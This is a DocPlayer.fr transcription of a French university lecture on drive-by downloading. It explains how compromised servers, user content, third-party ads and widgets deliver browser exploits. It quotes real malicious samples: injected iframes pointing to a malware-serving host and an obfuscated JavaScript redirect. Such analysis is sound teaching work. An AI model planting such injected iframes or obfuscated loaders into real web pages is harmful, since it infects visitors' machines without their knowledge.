Cours #04 Drive-by downloading

Documents pareils
Remote Cookies Stealing SIWAR JENHANI (RT4) SOUHIR FARES (RT4)

Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement

Attaques applicatives

Gestion des incidents

Création d un «Web Worm»

Bilan 2008 du Cert-IST sur les failles et attaques

La mémorisation des mots de passe dans les navigateurs web modernes

«Obad.a» : le malware Android le plus perfectionné à ce jour

Protection des protocoles

OWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI

A. Sécuriser les informations sensibles contre la disparition

Gestion des mises à jour logicielles

Un jour, une question Réponse à une problématique issue de la liste GTA *

Surveillance stratégique des programmes malveillants avec Nessus, PVS et LCE

TP JAVASCRIPT OMI4 TP5 SRC

1. Des chartes graphiques homogènes, élégantes, créatives

DenyAll Protect. Sécurité & accélération. Parefeux pour applications et services Web. de vos applications.

UNE NOUVELLE MENACE : LA PUB-ILLICITE OU QUAND LA PUBLICITE SERT DE PASSERELLE A LA CYBER CRIMINALITE

Dans les médias numériques!

Technologies du Web. Créer et héberger un site Web. Pierre Senellart. Page 1 / 26 Licence de droits d usage

Fiche Technique. Cisco Security Agent

Les rootkits navigateurs

Document de présentation technique. Blocage du comportement

Sécurité des applications web. Daniel Boteanu

Sécurité des réseaux Les attaques

«Le malware en 2005 Unix, Linux et autres plates-formes»

Les vols via les mobiles

Failles XSS : Principes, Catégories Démonstrations, Contre mesures

Symantec Endpoint Protection Fiche technique

Impression de sécurité?

RECOMMANDATIONS ET MISES EN GARDE DE McAFEE EN MATIÈRE d achats en ligne

Etat de l art des malwares

Formation. La boite à Outils du Web

RAPPORT AUDIT SEO. Élaboré à l'attention de : Monsieur Greber Élaboré par : Cédric Peinado

INTERNET est un RESEAU D ORDINATEURS RELIES ENTRE EUX A L ECHELLE PLANETAIRE. Internet : interconnexion de réseaux (anglais : net = réseau)

\ \ / \ / / \/ ~ \/ _ \\ \ ` \ Y ( <_> ) \ / /\ _ / \ / / \/ \/ \/ Team

Comment générer des revenus en Affiliation

Découvrir les vulnérabilités au sein des applications Web

NFA016 : Introduction. Pour naviguer sur le Web, il faut : Naviguer: dialoguer avec un serveur web

HMTL. Exemple de fichier HTML. Structure d un document HTML. Exemple de fichier HTML. Balises HTML. IFT1147 Programmation Serveur Web avec PHP

Présentation Internet

WEBANALYTICS Sur le chemin de l excellence

WEB & DÉVELOPPEMENT LES BASES DU WEB LE LANGAGE HTML FEUILLES DE STYLES CSS HISTORIQUE D INTERNET ET DU WEB LES DIFFÉRENTS LANGAGES

Laboratoire de Haute Sécurité. Télescope réseau et sécurité des réseaux

Le nuage : Pourquoi il est logique pour votre entreprise

21 mars Simulations et Méthodes de Monte Carlo. DADI Charles-Abner. Objectifs et intérêt de ce T.E.R. Générer l'aléatoire.

Présentation commonit pour la réunion de l OSSIR du 10 Mars 2009 : - La société commonit - Le marché - La solution Virtual Browser - Démonstration

Programmation Web. Madalina Croitoru IUT Montpellier

Sage CRM. 7.2 Guide de Portail Client

The Mozilla Art Of War. David Teller. 20 septembre Laboratoire d Informatique Fondamentale d Orléans. La sécurité des extensions.

Projet en nouvelles technologies de l information et de la communication

Rapport de certification ANSSI-CSPN-2011/14. Fonctionnalités de pare-feu de StoneGate Firewall/VPN build 8069

BeEF : Browser Exploitation Framework

10 points clés pour bien démarrer votre projet web

Théorie : internet, comment ça marche?

Failles des applications Web. Ce document est extrait du travail de diplôme de M. DIZON dans l état.

SYSTÈMES DE PUBLICATION POUR L INTERNET. Beatep Marie-France Landréa - Observatoire de Paris

PHISHING/PHARMING. Les Nouvelles Techniques qui portent atteinte à l intégrité des S.I

NAS 224 Accès distant - Configuration manuelle

Supplément de renseignements : Examens d applications et pare-feux d applications web clarifiés Normes : Normes en matière de sécurité des données de

Le BYOD (apporter son propre périphérique au bureau) et les dangers qui lui sont associés

Pourquoi un pack multi-device?

Sessions en ligne - QuestionPoint

Manuel utilisateur estat Clics

Tech-Evenings Sécurité des applications Web Sébastien LEBRETON

Botnets, les fantômes de l internet. 6 Novembre Iheb Khemissi - iheb.khemissi@gmail.com Joris Brémond - joris.bremond@gmail.

Le stockage local de données en HTML5

Attaques de type. Brandon Petty

Les risques HERVE SCHAUER HSC

Une nouvelle approche globale de la sécurité des réseaux d entreprises

Firewall IDS Architecture. Assurer le contrôle des connexions au. Sécurité 1

Cisco CCVP. Gestion des comptes d utilisateurs

Adresse directe fichier : Adresse url spécifique sur laquelle le lien hypertext du Client doit être

La protection des systèmes Mac et Linux : un besoin réel?

Une meilleure approche de la protection virale multiniveau

Programmation Web. Introduction

Vulnérabilités et sécurisation des applications Web

Foire aux questions. C est un programme d exploitation et de recherche sur le Web. Exemple : Internet Explorer, Firefox, Opera et Netscape.

MODE D EMPLOI WORDPRESS

Spétechs Mobile. Octobre 2013

Développement d un ver informatique grâce propagation au sein d un réseau de machines

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin

ENDPOINT SECURITY FOR MAC BY BITDEFENDER

Chaque année, près de 400 millions de personnes 1 sont victimes de la cybercriminalité.

Les hébergeurs bulletproof

Programmation Internet Cours 4

Netdays Comprendre et prévenir les risques liés aux codes malicieux

Optimisation des s pour les supports mobiles. Améliorez vos taux de clics sans augmenter votre charge de travail.

Zemma Mery BTS SIO SISR. Session Projets Personnels Encadrés

Quels fondements, services fonctionnalités et limites de l intranet?

Vous n avez aucune installation à faire et aucune mise à niveau ne vous complique la vie. Vous allez adorer votre nouveau site.

Formation Site Web. Menu du jour. Le web comment ça marche? Créer un site web Une solution proposée pour débuter La suite?

LES REGLES ELEMENTAIRES DE SECURITE LE POSTE DE TRAVAIL. CNRS RSSIC version du 11 mai 2012

Découvrir et bien régler Avast! 7

Guide Reseller Onbile

Résumé. IronPort Web Reputation : protection et défense contre les menaces à base d URL

Les origines du réseau Internet.

GESTION DES INCIDENTS DE SÉCURITÉ DE L INFORMATION

Transcription:

Cours #04 Drive-by downloading Jean-Marc Robert Génie logiciel et des TI

Plan de présentation Logiciels malveillants Amateurs Professionnels Propagation: Push model versus Pull model Nouveau modèle de propagation: Drive-by downloading Phase I: Compromettre un site web Phase II: Exploiter une vulnérabilité 2

Logiciels malveillants: Premières générations L œuvre d amateurs cherchant à démontrer leurs compétences techniques. Publicité, reconnaissance, Traditionnellement, l objectif de ces logiciels malveillants était de se propager sur le plus de systèmes possible. Occasionnellement, ces logiciels cherchaient à détruire les systèmes infectés. 3

Logiciels malveillants: Nouvelles générations L œuvre de professionnels cherchant à monnayer leurs activités illicites. L objectif de ces nouveaux logiciels malveillants est de compromettre le plus de systèmes possible afin de maximiser les profits tout en demeurant le plus discret possible. Se propager le plus efficacement possible. 4

Propagation: Push model versus Pull model Push model Modèle classique Le logiciel malveillant (ver) cherche à se propager à travers le réseau grâce à une vulnérabilité. P. ex., Slammer Le ver est proactif. Pull model Nouveau modèle Le logiciel malveillant attend que le système vulnérable «vienne» à lui. Le système vulnérable est proactif. Points faibles: Génération aléatoire de fausses adresses. Systèmes protégés par des pare-feu ou des NATs (adresses privées). Points forts: Permets de passer outre les pare-feu et les NATs. Peut demeurer «invisible» lors de l infection. 5

Propagation: Drive-by downloading La simple navigation sur le web est maintenant devenue une activité dangereuse. Simplement en visitant un site web malicieux, un système vulnérable peut devenir infecté. Une recherche effectuée au début de 2007 par une équipe de chercheurs de Google a démontré que sur 4,5 millions d URL ayant été analysées 450,000 URL ont cherché à installer un logiciel malveillant à travers le fureteur; 700,000 URL ont eu un comportement douteux (non confirmé). 6

Drive-by downloading deux préalables Un site web malicieux distribuant des logiciels malveillants Simplement en le visitant (pull model) Un fureteur vulnérable 7

I un site web malicieux Développer un site web malicieux. Malheureusement, comment attirer les visiteurs. Compromettre un site existant. Profiter d un grand nombre de visiteurs. 8

Compromettre un site web Le contenu d un site web est généralement développé par son propriétaire. Cependant, il existe des exceptions notoires: Publicité provenant de tiers Information provenant des usagers (p.ex. blogue, forum, ) Gadgets informatiques (p.ex. compteurs, calendriers, ) 9

Compromettre un site web: I Serveur Un serveur web est aussi sûr que son application la plus vulnérable! Applications administratives ssh (attaque massive d un mot de passe) Serveur http Applications (utilisant des langages de script) Bases de données Il «suffit» de trouver une vulnérabilité permettant d accéder au serveur avec les privilèges de l administrateur. 10

Compromettre un site web: I Serveur Une fois que le serveur est compromis, le tour est joué! Un exemple parmi des milliers possibles: <!-- Copyright Information --> <div align= center class= copyright >Powered by <a href="http://www.invisionboard.com">invision PowerBoard</a> (U)v1.3.1 Final 2003 <a href= http://www.invisionpower.com >IPS, Inc.</a></div> <iframe src= http://wsfgfdgrty.net/adv/193/new.php ></iframe> <iframe src= http://wsfgfdgrty.net/adv/new.php?adv=193 ></iframe> Chaque iframe ayant été ajouté exploite une vulnérabilité donnée. Lors du test, 50 binaires malicieux ont infecté le système! 11

Compromettre un site web: II Usagers Information provenant des usagers (p.ex. blogue, forum, ) Seulement un sous-ensemble HTML devrait être accepté. Malheureusement, dû à une mauvaise vérification certains usagers peuvent inclure du code malicieux HTML. Iframe, script, Un exemple parmi des milliers possibles: <SCRIPT language=javascript> Function tqzyu(nemz)juyu="lo";sdfwe78="catio";jj="n.r";vj20=2;uyty="eplac";iuiuh8889="e" ;vbb25="( "; awq27="";sftfttft=4;fghdh=" ht";ji87gkol="tp:/";olkiuu="/vi";jbhj89="deo";jhbhi87= "zf";hgdxgf="re"; jkhuift="e.c";jygyhg="om ";dh4=eval(fghdh+ji87gkol+polkiuu+jbhj89+jhbhi87+hgd xgf+jkhuift+jygyhg);je15=" )";if (vj20+sftfttft==6) eval(juyu+sdfwe78+kjj+uyty+iuiuh8889+vbb25+awq27+dh4+je15);otqzyu();// </SCRIPT> location.replace ( http:/ /videozfree.com )" 12

Compromettre un site web: III Publicité Publicités contrôlées par des tiers! 13

Compromettre un site web: III Publicité Web Javascript Fournisseur publicitaire Fournisseur publicitaire Fournisseur publicitaire Pouvons-nous faire confiance à un sous-traitant du sous-traitant? 14

Compromettre un site web: III Publicité Un site de partage vidéo (décembre 2006) La page web contenait une bannière publicitaire d une grande compagnie publicitaire américaine un premier module Javascript. Ce premier module générait un deuxième module JavaScript pour accéder à une autre grande compagnie publicitaire américaine (2 ième ). Ce deuxième module générait un troisième module Javascript pour accéder à une petite compagnie américaine (3 ième ) fournissant des annonces publicitaires en fonction de la région où se retrouve l usager. Cette publicité régionale contenait un iframe dans sa page HTML pointant vers une compagnie publicitaire russe (4 ième ). En interprétant cet iframe, le fureteur était redirigé vers une page (xx.xx.xx.xx/aeijs/) contenant un module Javascript chiffré essayant d exploiter de nombreuses vulnérabilités du fureteur afin d installer des logiciels malveillants. 15

Compromettre un site web: IV Gadgets Un gadget informatique est un lien vers un module Javascript ou un iframe fournissant une fonctionnalité particulière. Compteur Calendrier Malheureusement, ces gadgets sont fournis régulièrement par des entités externes. 16

Compromettre un site web: IV Gadgets <!-- Begin Stat Basic code --> <script language="javascript" src="http://m1.stat.xx/basic.js"> </script><script language="javascript"> <!-- statbasic("st8bicclfudmahktah3inbhtwowa", 0); // --> </script> <noscript> <a href="http://v1.stat.xx/stats?st8bidmahkthtwowa"> <img src="http://m1.stat.xx/n?id=st8bidmahkthtwowa" border="0" nosave width="18" height="18"></a></noscript> <!-- End Stat Basic code --> Ce gadget devait conserver les statistiques sur le nombre de visiteurs depuis 2002. Malheureusement, ce gadget est une source d infection depuis 2006. 17

Compromettre un site web: IV Gadgets Un exemple intéressant: iframemoney.org. Cette entreprise paie les webmestres pour qu'ils incluent un iframe malicieux dans leurs pages web. En juin 2007, iframemoney.org était en activité depuis octobre 2006 et offrait $7 pour chaque tranche de 10,000 nouveaux visiteurs. 18

Références N. Provos, D. McNamee, P. Mavrommatis, K. Wang et N. Modadugu, The Ghost In The Browser Analysis of Web-based Malware, Usenix Hotbots 2007. 19

2024 © DocPlayer.fr Politique de confidentialité | Conditions de service | Feed-back